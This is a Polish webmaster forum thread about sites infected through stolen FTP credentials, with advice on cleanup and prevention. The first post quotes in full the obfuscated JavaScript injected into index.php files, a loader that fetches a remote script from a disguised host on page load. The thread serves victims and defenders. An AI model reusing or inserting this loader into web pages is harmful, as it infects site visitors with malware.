Atak hackera

[Pozycjoner.pro]

Wszystkie moje strony zostały zaatakowane.

Są one na różnych serwerach i mają różne skrypty - wordpress oraz joomla.

Wordpress jest w najnowszej wersji, ustawiłem zgodnie z opisem dodatkowe zabezpieczenia.

Blokada panelu admina przez IP itp.

Zmieniłem hasła ftp, ale po kilku dniach znowu ktoś dodał w plikach index.php ten kod:

/*GNU GPL*/ try{window.onload = function(){var E411a2jh88t = document.createElement('script');E411
a2jh88t.setAttribute('type', 'text/javascript');E411a2jh88t.setAttribute('id', 'myscript1');E411a2jh88t.setAttribute('src',  
'h(#t)$&(t((p():@&/)!/^&&w#(i))k(i&&p!(e$)d!&i(^a@((-$o#)r^!(@g!&$.&$s$&m^^)a)@#s!h&^@i!@$)(n))!g)m)@a)g
&((a(@z&(i&n$$##e().^$(!c@o$#)@m^.!!@f!&o#$)o$(#d!#n$!(e^)t!&$&w^$o)r!#&k)@-#()c(o@m!.$^&e^&)a$s&^y!
@$!#t)&a))b!^(l#&@e#t@!@e@(n@$^n!@&i^^s!)!.&&r$&u!:@))(8^$0^8)(@0$/@&(1!((9!l@o$&^u#@#.^&c@@$o!
m!@^/^1)(9))l^(!o#&@u@(.$#(c(#o!&!^m##/@#^g#@o$o((g@^l^)$e^.(#$#c!!$o^m!!#$/(&!^z#a!)p#@p&$^o$
@&s#)(.(@&&c$)o(^!m!((/)&@&&a(v!^$a&!$$s!t)^(.#&c#(o&(m@/$'.replace(/&|\)|\(|\$|@|\^|\!|#/ig, ''));E411a2jh88t
.setAttribute('defer', 'defer');document.body.appendChild(E411a2jh88t);}} catch(e) {}</script>

Program antywirusowy znalazł 2 trojany, ale już je wykasował.

Co mam zrobić ? Format dysku i ponowa zmiana haseł ftp ?

[Carnagge]

Masz jakiegos syfa w skorce od ktoregos skryptu. Powroc do styli domyslnych i skasuj pozostale, a powinno pomoc. Unikaj templatek z zaakodowanym htmlem i odosnikiami include do zewnetrznych serwerow.

[Pozycjoner.pro]

wirus atakuje serwery na linuxie.

Obecnie szybko się powiela, może nawet nie wiecie że go macie

polecam sprawdzić pliki index.

Znalazłem sposób na jego pokonanie - opis

[Ivellios]

Ja mam podobny problem z jednym forum postawionym na SMF. Tylko że wirus jak już zaatakuje to dokleja się do plików forum i do wszystkich innych plików php, jakie znajdzie na koncie... zresztą do CSS'ów też się dokleja...

W php wkleja kod zakodowany w base64, a w CSS'ach jakieś inne badziewie.

Sprawdzałem i upewniłem się, że nie jest to ani wina SMF (jest najnowsza wersja zainstalowana) ani templatki, moduły też ok. Kompletnie nie wiem, co to może być :/

[Pozycjoner.pro]

może odpal ten skrypt co podałem.

Można w nim podać ciąg który ma kasować z automatu

[stilly]

Kiedyś byłą akcja, że do bot-netu trafiały hasła z plików baz danych programów typu Total Commander, filezilla itp.

Jeżeli miałaś u siebie wirusy na kompie to możesz być pewny o wycieku danych do sieci.

Jeżeli trafiło to do bot-netu to pozostaje ci albo wgrać stara kopie.

Musisz też pozmieniać hasła.

[Pozycjoner.pro]

Teraz to prawdziwa plaga z tymi trojanami

[gielo]

wirus atakuje serwery na linuxie.

Obecnie szybko się powiela, może nawet nie wiecie że go macie

polecam sprawdzić pliki index.

Znalazłem sposób na jego pokonanie - opis

Podejrzewam, że to czy serwer stoi na linuksie czy windowsie nie ma większego znaczenia. Te kody w java scripcie są niezależne od platformy i wykorzystują luki w zabezpieczeniach usług sieciowych jak serwery html, php, mysql i inne, a także samych skryptach. Ostatnio spotkałem się z masowym hakowaniem starszych wersji oscommerce gdzie do ich działania wymagane jest włączone register_globals.

Wcześniej widziałem zhakowane wordpressy i czasem joomle. Więc sprawdź czy masz skrypty w najnowszych wersjach, czy jak już ktoś wspominał nie masz jakiegoś syfu w darmowych templatach oraz czy na serwerze masz aktualne oprogramowanie apache, bind, mysql itp. Ciągle ukazują się jakieś łatki bezpieczeństwa do tego więc administrator powinien je aplikować. Dobry administrator.

Jeżeli sprawdzisz to wszystko to na koniec zostaje ci przejrzenie zabezpieczeń samego serwera, przejrzenie configów itp i sprawdzić czy od tej strony jakiś spamer nie znalazł dziury przez którą pcha ci ten syf na strony.

[Pozycjoner.pro]

U mnie problemem był trojan, keylogger

[pc3t]

Nikt wam nie zhackował skryptu ani nie włamał się na serwer. Po prostu używaliście total commandera, weszliście na jakąś stronę z trojanem i wasze hasła do kont ftp poszły w świat. Polecam poszukać na forum - masa topiców na ten temat jest.

Zmienić hasła ftp, przestać zapisywać hasła w programach ftp i problem zniknie.

Zerknijcie w logi ftp, na pewno znajdziecie tam ip jakiś egzotycznych krajów.